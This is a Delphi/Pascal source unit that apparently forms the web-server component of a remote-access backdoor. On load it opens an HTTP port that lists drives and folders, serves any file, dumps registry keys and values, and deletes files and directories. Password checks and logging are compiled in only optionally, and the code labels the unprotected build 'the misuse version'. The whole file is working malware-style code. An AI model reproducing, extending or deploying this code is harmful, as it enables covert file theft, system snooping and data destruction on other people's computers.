// Webserver unit

Unit WebServ;
{$I DEFS.PAS}
Interface
Implementation
Uses Windows,Classes,SysUtils,WinSock,Socks,Glob,RegFuncs{,Graphics};
Var
	F,F2				:DWord;
	HTTPLogs			:TStringList;
Procedure SendScreen(Sock:TClientSocket);
	{Var
		DC		:HDC;
		W,H,L,X,Y	:LongInt;
		GifImage	:TBitmap;
		Stream	:TMemoryStream;
		Headers	:String;
		S		:Integer;
		P		:Pointer;}
	Begin
		(* DC := GetDC(0);
		W := GetSystemMetrics(SM_CXScreen);
		H := GetSystemMetrics(SM_CYScreen);
		L := GetMessagePos;
		X := LoWord(L);
		Y := HiWord(L);
		GifImage := TBitmap.Create;
		Stream := TMemoryStream.Create;
		GifImage.Width := 320;
		GifImage.Height := 200;
		GifImage.Canvas.Rectangle(-1,-1,GifImage.Width + 1,GifImage.Height + 1);
		BitBlt(GifImage.Canvas.Handle,0,0,320,200,DC,X - 160,Y - 100,SRCCopy);
		ReleaseDC(0,DC);
		GifImage.SaveToStream(Stream);
		// JPEGImage.Canvas.CopyRect(Rect(0,0,319,199),Image.Canvas,Rect(0,0,319,199));}
		Headers := 'Content-type: image/bitmap'{#13#10'Conetent-length: ' + IntToStr(Stream.Size)} + #13#10#13#10;
		{Send(Sock.Sock,PChar(Headers)^,Length(Headers),0);
		Send(Sock.Sock,Stream.Memory^,Stream.Size,0);}
		// messagebox(0,pchar(headers),'',0);
		Sock.Write(PChar(Headers)^,Length(Headers));
		// Sock.Write(Stream.Memory^,Stream.Size);
		P := Stream.Memory;
		S := Stream.Size;
		While S > 0 do Begin
			If S > 1024 then Begin
				Sock.Write(P^,1024);
				Dec(S,1024);
				P := Pointer(Cardinal(P) + 1024);
			End Else Begin
				Sock.Write(P^,S + 1);
				S := 0;
			End;
			Sleep(300);
		End;
		Stream.Free;
		GifImage.Free; *)
	End;
Procedure HTTPServer_GET(Sock:TClientSocket; Filename:String);
	Var
		ToSend,Pass,TS,TS2,OrigFN	:String;
		D,D2						:DWord;
		S						:TSearchRec;
		B						:Array[0..4096] of Char;
		F						:Integer;
		FileFinnished				:Boolean;
		Temp,Temp2				:TStringList;
		Key						:HKey;
		DocType					:String;
	Label Ble,SErr,ListPath;
	Begin
		Try
			// Init
			ToSend := '';

			// Get password, if supplied
			If Pos('?',Filename) > 0 then
				Pass := Copy(Filename,Pos('?',Filename) + 1,$FFFF)
			Else
				Pass := '';
			If Pos('?',Filename) > 0 then
				Filename := Copy(Filename,1,Pos('?',Filename) - 1);

			// Check password (if security enabled)
			{$IFDEF Security}
			If (Filename <> '/') {and (Filename <> '/DUMP.GIF')} and (Pass <> AdminPass) then Begin
				ToSend := '<html><title>Access denied</title><h1>Access denied</h1>URL format: http://[host]/[searchpath on machine]?[admin password]</html>';
			End Else{$ENDIF} Begin
				// Make /'s \'s.
				OrigFN := Filename;
				For D := 1 to Length(Filename) do
					If Filename[D] = '/' then
						Filename[D] := '\';
				If Length(Filename) = 0 then
					ToSend := '<html><title>Bad request.</title>Bad request.</html>'
				Else Begin
					If Filename[Length(Filename)] = '\' then Begin // Directory listing
						ToSend := '<!-- Listing of ' + OrigFN + '-->'#13#10'<!-- Server:' + AppName + '-->'#13#10#13#10;
						ToSend := ToSend + '<html><title>' + Filename + ' on ' + GetUsername + '</title><h1>Listing of ' + AnsiLowerCase(Filename) + ' on ' + GetUsername + ':</h1><hr><table>'#13;

						Delete(Filename,1,1);
						If Filename = '' then Begin // List avaiable drives
							For D := Ord('A') to Ord('Z') do Begin
								D2 := GetDriveType(PChar(Chr(D) + ':\'));
								If D2 > 2 then Begin
									ToSend := ToSend + '<tr><td width=200>(Drive) <a href="/' + Chr(D) + ':/?' + Pass + '">' + Chr(D) + ':</a></td><td>';
									Case D2 of
										DRIVE_REMOVABLE:	ToSend := ToSend + 'DRIVE_REMOVABLE';
										DRIVE_FIXED:		ToSend := ToSend + 'DRIVE_FIXED';
										DRIVE_REMOTE:		ToSend := ToSend + 'DRIVE_REMOTE';
										DRIVE_CDROM:		ToSend := ToSend + 'DRIVE_CDROM';
										DRIVE_RAMDISK:		ToSend := ToSend + 'DRIVE_RAMDISK';
									End;
									ToSend := ToSend + '</td></tr>'#13;
								End;
							End;
							ToSend := ToSend + '<tr><td>(Dir) <a href="sysreg/?' + Pass + '">sysreg</a></td><td>System registry</td></tr>'#13#10;
							ToSend := ToSend + '<tr><td><a href="http.log?' + Pass + '">http.log</a></td><td>Server logs</td></tr>'#13#10;
						End Else If AnsiUpperCase(Copy(FileName,1,7)) = 'SYSREG\' then Begin // System registry
							Delete(Filename,1,7);
							Temp := TStringList.Create;
							Temp2 := TStringList.Create;
							TS2 := AnsiUpperCase(Copy(Filename,1,Pos('\',Filename) - 1));
							Delete(Filename,1,Length(TS2) + 1);
							If TS2 = '' then Begin // List main keys
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_CLASSES_ROOT/?' + Pass + '">HKEY_CLASSES_ROOT</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_CURRENT_CONFIG/?' + Pass + '">HKEY_CURRENT_CONFIG</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_CURRENT_USER/?' + Pass + '">HKEY_CURRENT_USER</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_DYN_DATA/?' + Pass + '">HKEY_DYN_DATA</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_LOCAL_MACHINE/?' + Pass + '">HKEY_LOCAL_MACHINE</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_PERFORMANCE_DATA/?' + Pass + '">HKEY_PERFORMANCE_DATA</a></td></tr>'#13#10;
								ToSend := ToSend + '<tr><td>(Key) <a href="HKEY_USERS/?' + Pass + '">HKEY_USERS</a></td></tr>'#13#10;
							End Else Begin
								Try
									// So what main key have we got??
									If TS2 = 'HKEY_CLASSES_ROOT' then
										Key := HKEY_CLASSES_ROOT
									Else If TS2 = 'HKEY_CURRENT_USER' then
										Key := HKEY_CURRENT_USER
									Else If TS2 = 'HKEY_LOCAL_MACHINE' then
										Key := HKEY_LOCAL_MACHINE
									Else If TS2 = 'HKEY_USERS' then
										Key := HKEY_USERS
									Else If TS2 = 'HKEY_PERFORMANCE_DATA' then
										Key := HKEY_PERFORMANCE_DATA
									Else If TS2 = 'HKEY_CURRENT_CONFIG' then
										Key := HKEY_CURRENT_CONFIG
									Else If TS2 = 'HKEY_DYN_DATA' then
										Key := HKEY_DYN_DATA;

									// Key subkeys
									Temp.Clear;
									Temp.SetText(PChar(GetKeyNames(Key,PChar(Filename))));
									Temp.Sort;
									ToSend := ToSend + '<tr><td width=200>(Key) <a href="../?' + Pass + '">..</a></td></tr>'#13#10;
									For D := 0 to Temp.Count - 1 do
										ToSend := ToSend + '<tr><td>(Key) <a href="' + Temp[D] + '/?' + Pass + '">' + Temp[D] + '</a></td></tr>'#13#10;

									// Key values
									Temp.Clear;
									Temp.SetText(PChar(GetValueNames(Key,PChar(Filename))));
									{For D := 0 to Temp.Count - 1 do Begin
										TS2 := Temp[D];
										ToSend := ToSend + '<tr><td width=200>';
										If TS2 <> '' then
											ToSend := ToSend + TS2
										Else
											ToSend := ToSend + '(std value)';
										ToSend := ToSend + '</td><td width=120>';
										Case GetValueDataType(Key,Filename,TS2) of
											REG_BINARY:			ToSend := ToSend + 'REG_BINARY';
											REG_DWORD:			ToSend := ToSend + 'REG_DWORD';
											REG_DWORD_BIG_ENDIAN:	ToSend := ToSend + 'REG_DWORD_BIG_ENDIAN';
											REG_EXPAND_SZ:			ToSend := ToSend + 'REG_EXPAND_SZ';
											REG_LINK:				ToSend := ToSend + 'REG_LINK';
											REG_MULTI_SZ:			ToSend := ToSend + 'REG_MULTI_SZ';
											REG_NONE:				ToSend := ToSend + 'REG_NONE';
											REG_RESOURCE_LIST:		ToSend := ToSend + 'REG_RESOURCE_LIST';
											REG_SZ:				ToSend := ToSend + 'REG_SZ';
										End;

										Case GetValueDataType(Key,Filename,TS2) of
											REG_DWORD,REG_DWORD_BIG_ENDIAN:
												ToSend := ToSend + '</td><td width=200>' + IntToStr(GetRegDWord(Key,PChar(Filename),PChar(TS2))) + 'd ' + IntToHex(GetRegDWord(HKEY_LOCAL_MACHINE,PChar(Filename),PChar(TS2)),8) + 'h</td>';
											REG_EXPAND_SZ,REG_SZ,REG_MULTI_SZ:
												ToSend := ToSend + '</td><td width=200>"' + GetRegString(Key,PChar(Filename),PChar(TS2)) + '"</td>';
											Else Begin
												D2 := SizeOf(B);
												GetRegBuf(Key,PChar(Filename),PChar(TS2),@B,D);
											//	SetString(TS2,B,D);
												ToSend := ToSend + '</td><td width=200>"' + ToStr(B,D) + '"</td>';
											End;
										End;
										ToSend := ToSend + '</td></tr>'#13#10;
									End;}
									Temp2.Clear;
									For D := 0 to Temp.Count - 1 do Begin
										TS2 := Temp[D];
										TS := '<tr><td width=200>';
										If TS2 <> '' then
											TS := TS + TS2
										Else
											TS := TS + '(std value)';
										TS := TS + '</td><td width=120>';
										Case GetValueDataType(Key,Filename,TS2) of
											REG_BINARY:			TS := TS + 'REG_BINARY';
											REG_DWORD:			TS := TS + 'REG_DWORD';
											REG_DWORD_BIG_ENDIAN:	TS := TS + 'REG_DWORD_BIG_ENDIAN';
											REG_EXPAND_SZ:			TS := TS + 'REG_EXPAND_SZ';
											REG_LINK:				TS := TS + 'REG_LINK';
											REG_MULTI_SZ:			TS := TS + 'REG_MULTI_SZ';
											REG_NONE:				TS := TS + 'REG_NONE';
											REG_RESOURCE_LIST:		TS := TS + 'REG_RESOURCE_LIST';
											REG_SZ:				TS := TS + 'REG_SZ';
										End;

										TS := TS + '</td><td width=200>';

										Case GetValueDataType(Key,Filename,TS2) of
											REG_DWORD,REG_DWORD_BIG_ENDIAN:
												TS := TS + IntToStr(GetRegDWord(Key,PChar(Filename),PChar(TS2))) + 'd ' + IntToHex(GetRegDWord(HKEY_LOCAL_MACHINE,PChar(Filename),PChar(TS2)),8) + 'h</td>';
											REG_EXPAND_SZ,REG_SZ,REG_MULTI_SZ:
												TS := TS + '"' + GetRegString(Key,PChar(Filename),PChar(TS2)) + '"</td>';
											Else Begin
												D2 := SizeOf(B);
												GetRegBuf(Key,PChar(Filename),PChar(TS2),@B,D);
												TS := TS + '"' + ToStr(B,D) + '"</td>';
											End;
										End;
										TS := TS + '</tr>';
										Temp2.Add(TS);
									End;
									Temp2.Sort;
									For D := Temp2.Count - 1 downto 0 do // Remove duplicates
										If Temp2.IndexOf(Temp2[D]) <> D then
											Temp2.Delete(D);
									ToSend := ToSend + Temp2.GetText;
								Finally
									Temp.Free;
									Temp2.Free;
								End;
							End;
						End Else If Copy(Filename,1,3) = 'del' then Begin
							Delete(Filename,1,3);
							Delete(Filename,Length(Filename),1);
							If Filename[1] = 'f' then Begin
								Delete(Filename,1,2);
								If DeleteFile(Filename) then
									ToSend := ToSend + 'File ' + Filename + ' removed.<META HTTP-EQUIV="Refresh" CONTENT="0; URL=/' + TS2 + '">'
								Else
									ToSend := ToSend + 'Could not remove ' + Filename + '.';
							End Else If Filename[1] = 'd' then Begin
								Delete(Filename,1,2);
								If RemoveDir(Filename) then
									ToSend := ToSend + 'Directory ' + Filename + ' removed.<META HTTP-EQUIV="Refresh" CONTENT="0; URL=/' + TS2 + '">'
								Else
									ToSend := ToSend + 'Could not remove directory ' + Filename + '. Directory not existing, not empty or not accessible.';
							End;
							TS2 := '';
							While Pos('\',Filename) > 0 do Begin
								TS2 := TS2 + Filename[1];
								Delete(Filename,1,1);
							End;
							Filename := TS2;
							ToSend := ToSend + '<hr><a href="/' + TS2 + '">Back</a>';
							// Goto ListPath;
						End Else Begin // List a path
							ListPath:
							TS2 := '';
							If Length(Filename) = 3 then
								ToSend := ToSend + '<tr><td width=200> (Dir) <a href="../?' + Pass + '">..</a></td></tr>'#13;

							If FindFirst(FileName + '*.*',faAnyFile,S) = 0 then Begin
								Temp := TStringList.Create;
								Temp2 := TStringList.Create;
								Repeat
									If S.Attr and faDirectory <> 0 then Begin
										If S.Name <> '.' then
											Temp.Add('<tr><td width=200> (Dir) <a href="' + {FileName +} S.Name + '/?' + Pass + '">' + S.Name
												    + '</a></td><td><font size="-2"><a href="/deld' + OrigFN + S.Name + '/?' + Pass + '">Del</a></font></td><td width=100>' + { IntToStr(S.Size) + }'</td><td>' + DateTimeToStr(FileDateToDateTime(S.Time)) + '</td></tr>'#13);
									End Else Begin
										Temp2.Add('<tr><td width=200><a href="' + {FileName +} S.Name + '?' + Pass + '">' + S.Name
												+ '</a></td><td><font size="-2"><a href="/delf' + OrigFN + S.Name + '/?' + Pass + '">Del</a></font></td><td width=100>' + IntToStr(S.Size) + '</td><td>' + DateTimeToStr(FileDateToDateTime(S.Time)) + '</td></tr>'#13);
									End;
								Until FindNext(S) <> 0;
								Temp.Sort;
								ToSend := ToSend + Temp.GetText;
								Temp.Free;
								Temp2.Sort;
								ToSend := ToSend + Temp2.GetText;
								Temp2.Free;
								(*
								Repeat
									If S.Attr and faDirectory <> 0 then Begin
										ToSend := ToSend + '<tr><td width=200> (Dir) <a href="' + {FileName +} S.Name + '/?' + Pass + '">' + S.Name;
										ToSend := ToSend + '</a></td><td width=100>' + IntToStr(S.Size) + '</td><td>' + DateTimeToStr(FileDateToDateTime(S.Time)) + '</td></tr>'#13;
									End Else Begin
										TS2 := TS2 + '<tr><td width=200><a href="' + {FileName +} S.Name + '?' + Pass + '">' + S.Name;
										TS2 := TS2 + '</a></td><td width=100>' + IntToStr(S.Size) + '</td><td>' + DateTimeToStr(FileDateToDateTime(S.Time)) + '</td></tr>'#13;
									End;
								Until FindNext(S) <> 0;
								*)
							End Else
								ToSend := ToSend + '<tr><td>Error reading directory.</td></tr>';
							FindClose(S);
							ToSend := ToSend + TS2;
						End;

						ToSend := ToSend + '</table>'; // Trig off table
					//	If Filename <> '' then
					//		ToSend := ToSend + '<hr><form method="post" enctype="multipart/form-data" action="/' + Filename + '">Upload file: <input type="file" name="file"><input type="submit"></form>'; // Upload form
						ToSend := ToSend + '<hr>' +
									    'Generated ' + DateTimeToStr(Now) + ' on ' + GetUsername + ', ' + GetHost + ' (' + GetIP + ').' +
									    '</html>'; // Timestamp and end
					End Else Begin // Get file
						If AnsiUpperCase(Filename) = '\DUMP.BMP' then Begin // Screendump (no admin pass needed)
							SendScreen(Sock);
							Goto Ble;
						End Else If AnsiUpperCase(Filename) = '\HTTP.LOG' then Begin // Server logs
							ToSend := '<html><pre>' + HTTPLogs.GetText + '</pre></html>';
						End Else Begin // Any file
							Delete(Filename,1,1);
							{AssignFile(F,Filename);
							Reset(F,1);}
							F := FileOpen(Filename,fmOpenRead);
							If IOResult = 0 then Begin
								DocType := LowerCase(ExtractFileExt(Filename));
								If Copy(DocType,1,4) = '.htm' then
									DocType := 'text/html'
								Else If (DocType = '.txt') or (DocType = '.bat') or (DocType = '.cfg') or (DocType = '.me') or (DocType = '.diz') or (UpperCase(Filename) = 'README') then
									DocType := 'text/plain'
								Else If Copy(DocType,1,3) = '.jp' then
									DocType := 'image/jpeg'
								Else If DocType = '.gif' then
									DocType := 'image/gif'
								Else
									DocType := 'application/binary';
								ToSend := 'HTTP/1.0 200 OK'#13#10'Content-Type: ' + DocType + #13#10;
								Sock.Write(PChar(ToSend)^,Length(ToSend));
								ToSend := 'Content-Length:' + IntToStr({FileSize(F)}FileSeek(F,0,2)) + #13#10#13#10;
								FileSeek(F,0,0);
								Sock.Write(PChar(ToSend)^,Length(ToSend));
								Repeat
									D := FileRead(F,B[0],SizeOf(B));
									FileFinnished := D = 0;
									If Sock.Write((@B[0])^,D) = $FFFF then
										Goto SErr;
									Sleep(500);
								Until FileFinnished;
								SErr:
								FileClose(F);
							End;
							Goto Ble;
						End;
					End;
				End;
			End;

			// ..Because this sends the data to the connector.
			ToSend := 'HTTP/1.0 200 OK'#13#10'Server: ' + Appname + #13#10'Content-type: text/html'#13#10'Content-length: ' + IntToStr(Length(ToSend)) + #13#10#13#10 + ToSend;
			Sock.Write(PChar(ToSend)^,Length(ToSend));
			Ble:
		Except
			// If something happens, CAN WE CARE!?!? NOOOOOOOOOOOOOOO!!
		End;
	End;
Procedure HTTPThread(Sock:TClientSocket); StdCall;
	Procedure KillThisThread;
		Begin
			Sock.Free;
			ExitThread(0);
		End;
	Function ReadKey:Char;
		Begin
			With Sock do Begin
				Try
					WaitForDataTime(2 * 60);
					If Read(Result,1) = 0 then
						Abort;
				Except
					KillThisThread;
				End;
			End;
		End;
	Procedure Readln(Var S:String);
		Var C:Char;
		Begin
			S := '';
			Repeat
				C := ReadKey;
				If C > #31 then
					S := S + C;
			Until C = #13;
		//	Writeln('');
		//	Readkey;
		End;
	Const
		IHTTP			= 'HTTP/1.0 200 OK'#13#10'Server: ' + AppName + #13#10'Content-type: text/html'#13#10'Content-length: ';
		HTTPErrMsg		= IHTTP + '17'#13#10#13#10'Bad HTTP command.';
	Var
		Cmd	:String;
		C	:Char;
	Begin
		// Get HTTP command
		Readln(Cmd);

		// Log
		Asm
			CLI
		End;
		Sock.Peer := Sock.Peer + ' (HTTP)';
		{$IFDEF SECURITY}
		HTTPLogs.Add(Sock.Peer + ':' + Cmd);
		{$ENDIF}
		Asm
			STI
		End;

		// Intepret
		If Copy(Cmd,1,4) = 'GET ' then Begin // GET Cmd
			Delete(Cmd,1,4);
			Cmd := Copy(Cmd,1,Pos(' HTTP',CMD) - 1);
			HTTPServer_GET(Sock,Cmd);
		End Else If Copy(Cmd,1,5) = 'POST ' then Begin // POST Cmd
			// Fuck you.
		End Else
			Sock.Write(PChar(HTTPErrMsg)^,Length(HTTPErrMsg));
		Repeat
		Until Sock.Read(C,1) <> 1; // This empty loop will wait for an socket error (DIZZ! DIZZ! DIZZ! :) )
	//	Sock.DestroyEx;
		Sock.Disconnect;
		Sock.Free;
		ExitThread(0);
	End;
Procedure MainHTTPThread; StdCall;
	Var
		F,F2	:DWord;
		SSock:TServerSocket;
	Label Reconn;
	Begin
		Try
			// Init HTTP logs
			HTTPLogs := TStringList.Create;
			{$IFDEF SECURITY}
			HTTPLogs.Add('HTTP Server started ' + DateTimeToStr(Now) + '.');
			HTTPLogs.Add('');
			{$ELSE}
			HTTPLogs.Add('Logging not avaiable; This is the misuse version of the software');
			{$ENDIF}

			// Open server port
			SSock := TServerSocket.Create(HTTPPort);
			MainPorts.Add(SSock);
			MainPorts_.Add(HTTPPort);
			SSock.Listen;

			// Wait for connections
			Reconn:
			Try
				With SSock do Begin
					WaitForConnection;
					F := 0;
					CreateThread(Nil,ThreadStackSize,@HTTPThread,Pointer(AcceptConnection),F,F2);
				End;
			Except
			End;
			Goto Reconn;
		Except
			ExitProcess(0);
		End;
	End;
Begin
	F := 0;
	CreateThread(Nil,ThreadStackSize,@MainHTTPThread,Nil,F,F2);
End.
